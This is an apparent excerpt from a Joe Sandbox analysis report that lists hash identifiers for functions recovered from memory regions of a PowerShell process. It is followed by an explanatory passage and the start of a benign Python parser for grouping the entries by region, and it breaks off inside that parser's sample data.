                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b2fa857993f661e2105ba1500c9ddf091576be0176a340191ef9eb315a3ec3e6
                    • Instruction ID: c7468665fff6c465f57799c0b975667604b4808134f61947365a6ba87ac46b98
                    • Opcode Fuzzy Hash: b2fa857993f661e2105ba1500c9ddf091576be0176a340191ef9eb315a3ec3e6
                    • Instruction Fuzzy Hash: D4316874A00264DFDB14DFA8D8A4D9DB7F2EF88204B158258E406AB761CB31EC01CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ca0bd1c2febe989855c99bbd4b3709b6c7a15e562a6c75c216398f6499225f27
                    • Instruction ID: c7468665fff6c465f57799c0b975667604b4808134f61947365a6ba87ac46b98
                    • Opcode Fuzzy Hash: ca0bd1c2febe989855c99bbd4b3709b6c7a15e562a6c75c216398f6499225f27
                    • Instruction Fuzzy Hash: D4316874A00264DFDB14DFA8D8A4D9DB7F2EF88204B158258E406AB761CB31EC01CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 52bb3b6998247ff8f62145f24dca9339eb3f2296769ef2ff71a5c866459c563d
                    • Instruction ID: 8dcb7aa6b7d3709129e954bb7364292424a5b012504e3281d7b22a7f29be547b
                    • Opcode Fuzzy Hash: 52bb3b6998247ff8f62145f24dca9339eb3f2296769ef2ff71a5c866459c563d
                    • Instruction Fuzzy Hash: 21314674A00264DFDB14DFA8D8A4D9DB7F2EF88314B158268E406AB761CB31EC05CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6ebde8bbe8e7d4a79b40866eba6c31501d99431b8747bffd6739435a026d2da6
                    • Instruction ID: c9a59d8218df2d667362d9c0bfd260681821303c683034ab8436e236b92de532
                    • Opcode Fuzzy Hash: 6ebde8bbe8e7d4a79b40866eba6c31501d99431b8747bffd6739435a026d2da6
                    • Instruction Fuzzy Hash: 9A214F767081914FE714972CD440AA9FBE2BFC6327B0D40B6E869CB752C624DC41C791
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d64ee566946ca3eadc45899698fad346302e4ccd03959e2c8d64d3d6ca626164
                    • Instruction ID: 56f8b1d294112c657fc22a1125a6a30946bd36284faa6412001fe17306171067
                    • Opcode Fuzzy Hash: d64ee566946ca3eadc45899698fad346302e4ccd03959e2c8d64d3d6ca626164
                    • Instruction Fuzzy Hash: 9E11A1327041259FE7149BA9E808BBBB7DBEBC9365F14857AD209C7780CA759C0187E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 25ea35de006deffc048ced025a244515952f44d49b5573a35bcc756171de6224
                    • Instruction ID: a58501193be8493c35e01ee562843d325cf44bd07b52b0d5e3fe7be68f2a566f
                    • Opcode Fuzzy Hash: 25ea35de006deffc048ced025a244515952f44d49b5573a35bcc756171de6224
                    • Instruction Fuzzy Hash: 3B214FB1D046199FDB00CF9AD544BDEFBF5FB48324F148519D414A3640D734A555CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ad1dc49b2209aedb33162b1488231d5455c42580e70f951ca961fbf40f85121d
                    • Instruction ID: d9ee23aba4a4248d235eca3e190125b262fbf4e532c8c8b3243c575849d1e861
                    • Opcode Fuzzy Hash: ad1dc49b2209aedb33162b1488231d5455c42580e70f951ca961fbf40f85121d
                    • Instruction Fuzzy Hash: F31167B0D042599FDB44DFA8D8409EEBBF2AF88314F15856DC519EB610EB30A840CFE5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2e0b69fc95f0439b81dcbd0ad9bfd372f4c4348adfc0da59466ec40bc9bc8840
                    • Instruction ID: f09f054cb35b1dc9ac19db7aad5d3174b5eb5ce7a874ff836bd6b95ac881ad09
                    • Opcode Fuzzy Hash: 2e0b69fc95f0439b81dcbd0ad9bfd372f4c4348adfc0da59466ec40bc9bc8840
                    • Instruction Fuzzy Hash: A81106B16081514FF714A72984907BDBBA6BBC7313F4D44B6DC75D7642CA24CC448392
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8b6d9cf1c9232cc4ead190e87a6a581616548ab4fe320842fa161b6781bf02a9
                    • Instruction ID: 73f277ecbf18ee4f5e22a98d0f0cbc0694e34dcad98b5c0e4e42d6d6a8ae6962
                    • Opcode Fuzzy Hash: 8b6d9cf1c9232cc4ead190e87a6a581616548ab4fe320842fa161b6781bf02a9
                    • Instruction Fuzzy Hash: 67214AB1D0461A9FDB10CF9AD5447EEFBF4FB48320F04852AE818A3640D774AA55CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1f744a73ddfba902b824e624e3bfeecd25eaa8b05a4e7cf84545a8ac812fd233
                    • Instruction ID: 414be000adb72f40a08c8d0f334c685588d3fea55f823452465d22bbccdc2b54
                    • Opcode Fuzzy Hash: 1f744a73ddfba902b824e624e3bfeecd25eaa8b05a4e7cf84545a8ac812fd233
                    • Instruction Fuzzy Hash: 6701FCB271C6218BFB388B79D4007B773D8EB80BA6F084576EC1EC7690D665DC408790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b058429b4f91930111bdae95f90e48d801b6a522e15ecb45c28922a838cf12fd
                    • Instruction ID: 27ea103802d9fd732207d876fcc5eea7880dd17ea50998fb9ecf640ae8f7ec96
                    • Opcode Fuzzy Hash: b058429b4f91930111bdae95f90e48d801b6a522e15ecb45c28922a838cf12fd
                    • Instruction Fuzzy Hash: 3D0125743047108BD320DB64D84492A7BA2EFC1218B49497DD6468B750EF75AD058BD6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 790b53fb4995c012a57eb3952fc38b54c1101d318cf7bd7a5fa197e98fb2680e
                    • Instruction ID: cdefc8e8ed3d20bc1e9e754c71b0602ae180833d75423eb4de22e6a0005b187e
                    • Opcode Fuzzy Hash: 790b53fb4995c012a57eb3952fc38b54c1101d318cf7bd7a5fa197e98fb2680e
                    • Instruction Fuzzy Hash: 2F01D8F5B093414FDB598668D41842A7BB9EFDA25871980AEDC04CB382EF21DC17C7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d8fb3f54e6cfeda4ad5341ff0203b937c0cdb930751e760ee45970d728c449ea
                    • Instruction ID: c310b753fe17065d3f169857f996d2d8ee9df5aa6fab13f635397846d0028391
                    • Opcode Fuzzy Hash: d8fb3f54e6cfeda4ad5341ff0203b937c0cdb930751e760ee45970d728c449ea
                    • Instruction Fuzzy Hash: A9014CB130D7618FE7398B35C400BBA7BE4AF82B61F0945EADC61CB292D764DC848791
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: de3b83673847b1bd9c0c408ecad6f9ff76abb3a5a3dd05209e9f025842677b23
                    • Instruction ID: bf8a034e25b98b8cd3b575e748e7092d0db1389d512453465b7dcef452b0f468
                    • Opcode Fuzzy Hash: de3b83673847b1bd9c0c408ecad6f9ff76abb3a5a3dd05209e9f025842677b23
                    • Instruction Fuzzy Hash: DE01F5743047118BD324DB68D884D2A77A6EFC0228B454A3CD6068BB44DF71EC058BD6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 75e4059ceecd5e68060063cf0da362cf8a27ae801b04b1c47b38b712fa9a6ff9
                    • Instruction ID: 9198c9d34d522153f41f49d006db18e02f2c5e7826c26233a1157e855d011fd9
                    • Opcode Fuzzy Hash: 75e4059ceecd5e68060063cf0da362cf8a27ae801b04b1c47b38b712fa9a6ff9
                    • Instruction Fuzzy Hash: C6F052B2B00104A7CB1496A8D8048DA77AAEFCA211F0000B9D906E3780EFB59D0BC7C0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d9565721ea6e883ed0a99e2f1a127879a8a6271da15e2c5a5f7f9be06fe421f6
                    • Instruction ID: 12b59d3df30b0cc9f7a779354511d14254d1f6b50e7a440f4faa2b488bc1e132
                    • Opcode Fuzzy Hash: d9565721ea6e883ed0a99e2f1a127879a8a6271da15e2c5a5f7f9be06fe421f6
                    • Instruction Fuzzy Hash: E9E01A737141265B6B48D6BB78045AFB7CBDBC4566308803AE60DC2644EE25C80656A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ebbb0eb3e4b8912a0af1ed9802be143a6a5450fb4e158fdf315f825dd3712b3d
                    • Instruction ID: 6197ce4c54966493d034e7cbc245164985d2567107a415c67ecd2764a51c1e08
                    • Opcode Fuzzy Hash: ebbb0eb3e4b8912a0af1ed9802be143a6a5450fb4e158fdf315f825dd3712b3d
                    • Instruction Fuzzy Hash: 97F08C613095104BE244E6B8F520A9A6B929BC6310F1A81EAD5088B38ADE78CC0387D0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 772007709c08467cb6c2f72b99bf4ba6d18c0416f78b6dbd8a5bbff3fccaa2cd
                    • Instruction ID: 4082436fa171a4df3c1c3ed36488860fa83975288bc4ed8daf2f1a3528930ba4
                    • Opcode Fuzzy Hash: 772007709c08467cb6c2f72b99bf4ba6d18c0416f78b6dbd8a5bbff3fccaa2cd
                    • Instruction Fuzzy Hash: F4E06536B1021497CB149669D8148EE77EAEBC9212F4400BDD906E7740DF759C15CBD1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c8f65ea284e13277991a5cecdadcdf759ce008c3c3e3c0d61cc6b59686eb43c2
                    • Instruction ID: 46e144d490aa15f451149fee414521e050b7e06c876324ef45f0e2fd242ef286
                    • Opcode Fuzzy Hash: c8f65ea284e13277991a5cecdadcdf759ce008c3c3e3c0d61cc6b59686eb43c2
                    • Instruction Fuzzy Hash: C0D0177B7194245B82149A9EFA4486AF79EDBC9A3531880BBE90DC7340DA62EC13C6D0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0fc440e6dc4ea68af5da1c331651d43fb856d9e94986db2f692b05b856b57fa9
                    • Instruction ID: f2ea5788597c2c124081a12a1239e7dbeb67a4a610b4d8d749a7ac20841450ff
                    • Opcode Fuzzy Hash: 0fc440e6dc4ea68af5da1c331651d43fb856d9e94986db2f692b05b856b57fa9
                    • Instruction Fuzzy Hash: 2CE0DFB5A0020ACBCB10DF94F9416EE73B1EBC1305F104429D109A3640DB34BE018F92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b2319bda78adcb53fe3a65834c0efdd37bd20136876f79781039a36f92270fba
                    • Instruction ID: 1e027ee4b30158881ba3c12fd4bb194d28cdff87a9dc3c6e456a1dd6776b7111
                    • Opcode Fuzzy Hash: b2319bda78adcb53fe3a65834c0efdd37bd20136876f79781039a36f92270fba
                    • Instruction Fuzzy Hash: D2E02E3270C008CBEB085B2CB89A2BEB33AF7C5716F004026E027C1482CB388A028B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 59f30bb5c4c97d4934faa504f75ba9fa0e500605c348bdefb86813b4514e76e5
                    • Instruction ID: b72ed831ba75a47747cc0e1e86a31ca03b00a4c1e9d33367f21c25c2d1e0c521
                    • Opcode Fuzzy Hash: 59f30bb5c4c97d4934faa504f75ba9fa0e500605c348bdefb86813b4514e76e5
                    • Instruction Fuzzy Hash: 9EE0C2BA6546009BEB24E754F9457BD33A2DBC5364F108539E219C3640EF38BC468B92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 278f29b94b42e5ddf35eaf2c85f56b6c1cc413b24fcb57d3e41a0868097befe5
                    • Instruction ID: 347feb95b48ba9143911364b62757a613eaf96d72579200f8f98b6b677666b74
                    • Opcode Fuzzy Hash: 278f29b94b42e5ddf35eaf2c85f56b6c1cc413b24fcb57d3e41a0868097befe5
                    • Instruction Fuzzy Hash: 6BE0C2B66541009BEB20E794F5467BE33A2EBC1355F008579E219C3680DF78AC464F92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bcae09bf3110ac324bd731ae796e3347481516799e7a6a77f089c8db9cc90b14
                    • Instruction ID: 226b37ba53b347c214b31e6e9de3e5c6e125dab152d802a5fcdbaae21422e739
                    • Opcode Fuzzy Hash: bcae09bf3110ac324bd731ae796e3347481516799e7a6a77f089c8db9cc90b14
                    • Instruction Fuzzy Hash: AEE0C2B66542059BEB20E754F8417FD33A2EBC1364F008539E21AC3A40DF78AC469B92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a23d04fc77f4479dbf6fe1e29b1f5ae1159530521290dcb4ab8f623400446090
                    • Instruction ID: 1b03e89573588afed1ad70e62483fd91a87eba03081a5d265078e16b0a1f4cc7
                    • Opcode Fuzzy Hash: a23d04fc77f4479dbf6fe1e29b1f5ae1159530521290dcb4ab8f623400446090
                    • Instruction Fuzzy Hash: A1E0C2B66541048BEB20EB54E4467FD33A6DBC2354F10C539E219C3640DF78A9065BA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ffcddc449ac0d03defe2ff9b0aa36c7f8c73259e790647f901dc6bd99d39e076
                    • Instruction ID: fba99c58a9a25f9d2d2ac1a7077e869e1579ad96b6fbe618dddd7ca571044ca2
                    • Opcode Fuzzy Hash: ffcddc449ac0d03defe2ff9b0aa36c7f8c73259e790647f901dc6bd99d39e076
                    • Instruction Fuzzy Hash: 54E0C2B66682048BEB20E794E8417FD73A2EBC1354F008939E229C3640DF78A9065B92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bcff23f372ca83eacdd1c2844280aa0d3c0cc87750bb898589dced8fc017516d
                    • Instruction ID: df14466dbf8b9890a3e01b287c40c372c4c28eea35b9bfe5fcc4994111fb4d01
                    • Opcode Fuzzy Hash: bcff23f372ca83eacdd1c2844280aa0d3c0cc87750bb898589dced8fc017516d
                    • Instruction Fuzzy Hash: AAE0C2BA654204CBEB20EB54F4417FD73A2EBC1354F108939E229C3640DF79A8069B92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2cb97916276ba66826ef4d56547af7c6ae19c1c545b644eca348b8fb6266ab09
                    • Instruction ID: eec3549f7af82aabd6558085f4c71099ca3b780c94ab72ec2a3d6fb3baed0fe2
                    • Opcode Fuzzy Hash: 2cb97916276ba66826ef4d56547af7c6ae19c1c545b644eca348b8fb6266ab09
                    • Instruction Fuzzy Hash: 76E0CD7565420587DB24D754E4416FD73A2DBC1354F004539D219C3640DF74B9855BD1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cb6e29d69bd8f960536452f0b7bcc9e0d8177adf0e6e423f73fd15defa89fa63
                    • Instruction ID: 55690e4e079df4a5611e1f3b21770eb0334c985924295504649554447bbb5467
                    • Opcode Fuzzy Hash: cb6e29d69bd8f960536452f0b7bcc9e0d8177adf0e6e423f73fd15defa89fa63
                    • Instruction Fuzzy Hash: D3E0C2BA654204CBEB20E754E4416FD73A2EBC1354F048539E219C3640DF78A8065B92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1f91bc9e52ef49577672aae2f428dd6d9b4521d4a5b40192cf0ee5eda39511e2
                    • Instruction ID: ef54917a094c39b3f7065b6722fa20a8f930897e18413fd3cb5ffccb737a58ed
                    • Opcode Fuzzy Hash: 1f91bc9e52ef49577672aae2f428dd6d9b4521d4a5b40192cf0ee5eda39511e2
                    • Instruction Fuzzy Hash: 13D05E352100109FC741EB68E408D8A7BAAEF492247115195E90D87321DB75EC008B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0a287456aca19ff60169c22407a2398b2b3eaf4fcc6fffc90e78e456f0204590
                    • Instruction ID: 1786c6972802eb3ef42f1db7e4071bff85a45853d49e93cbd5e5bf6a456e599c
                    • Opcode Fuzzy Hash: 0a287456aca19ff60169c22407a2398b2b3eaf4fcc6fffc90e78e456f0204590
                    • Instruction Fuzzy Hash: 03D0C975B086118F9728CB3DB410853B7E6AB88360311C47EE86AC7704EB74EC018F54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e2bd919884b24aa95c22c78193991b48a82afda05754cf983d0cff26a0ace557
                    • Instruction ID: 7c9fbea7f6da13ff7a3e82891c80ae8da485dfafb6a79d1755808f7cf3c86ca4
                    • Opcode Fuzzy Hash: e2bd919884b24aa95c22c78193991b48a82afda05754cf983d0cff26a0ace557
                    • Instruction Fuzzy Hash: 90B0923BB18028CB9A085A9DB8550ECF339E6C9126F605077E22EC20869B758A294690
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4fc0be0c48afd20bd2185e3edf65d80524ee0520bfe5a0e02d9b9a3bbca59942
                    • Instruction ID: b2ad208492609770aa2c567a870162936976a23ea1e775c08681dc8c2dc28be7
                    • Opcode Fuzzy Hash: 4fc0be0c48afd20bd2185e3edf65d80524ee0520bfe5a0e02d9b9a3bbca59942
                    • Instruction Fuzzy Hash: ABC02B33B0814899DB00A6FC74098DCF730D843035F400267D23A414C1532183148210
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 36e3a4a9a4b98b0d51a8985e213de6837da9dc6a7359d59a93124cb3c37c3803
                    • Instruction ID: f3f2a0a642ad4023dc382e45e20ac1082d4290c7609959182f0e4b790432af91
                    • Opcode Fuzzy Hash: 36e3a4a9a4b98b0d51a8985e213de6837da9dc6a7359d59a93124cb3c37c3803
                    • Instruction Fuzzy Hash: 7EB012CA904984C4F25021E09C1538410B0EFD5304FCEC8720D77203803C0D60268091
                    Uniqueness

                    Uniqueness Score: -1.00%
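Each "Memory Dump Source" block above is one function the Joe Sandbox IDA plugin recovered from a memory region that is not backed by a PE image ("based on PE: false") in process index 14 (0x0E in the .sdmp name; the snapshot name "hcaresult_14_2_…" repeats the same index, dump type and region base). Two regions recur, 0x07A10000 and 0x07B00000, and every entry carries a 64-hex opcode ID, an instruction ID and the two fuzzy hashes. A triage analyst rarely reads these one by one; the useful step is to parse the listing, group functions by region and confirm the file names are internally consistent. The parser below is an added example and not Joe Sandbox code. The three records embedded in it are copied from the listing above (bullets and indentation removed). Reading the fifth dotted field of the .sdmp name as the region's Win32 page protection (0x40 = PAGE_EXECUTE_READWRITE) is an assumption; the page does not define that field, and the last three fields are left uninterpreted.

```python
"""Parse Joe Sandbox 'Memory Dump Source' entries and summarise them per region.

Added example for triaging the listing above; not Joe Sandbox code.
ASSUMPTION: dotted field 5 of the .sdmp name is the Win32 page protection.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# Three records copied from the report listing above (bullets removed). The
# first keeps the full layout; the other two keep only the lines parsed here.
SAMPLE_LISTING = """\
Memory Dump Source
Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
Joe Sandbox IDA Plugin
Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
Similarity
API ID:
String ID:
API String ID:
Opcode ID: c8f65ea284e13277991a5cecdadcdf759ce008c3c3e3c0d61cc6b59686eb43c2
Instruction ID: 46e144d490aa15f451149fee414521e050b7e06c876324ef45f0e2fd242ef286
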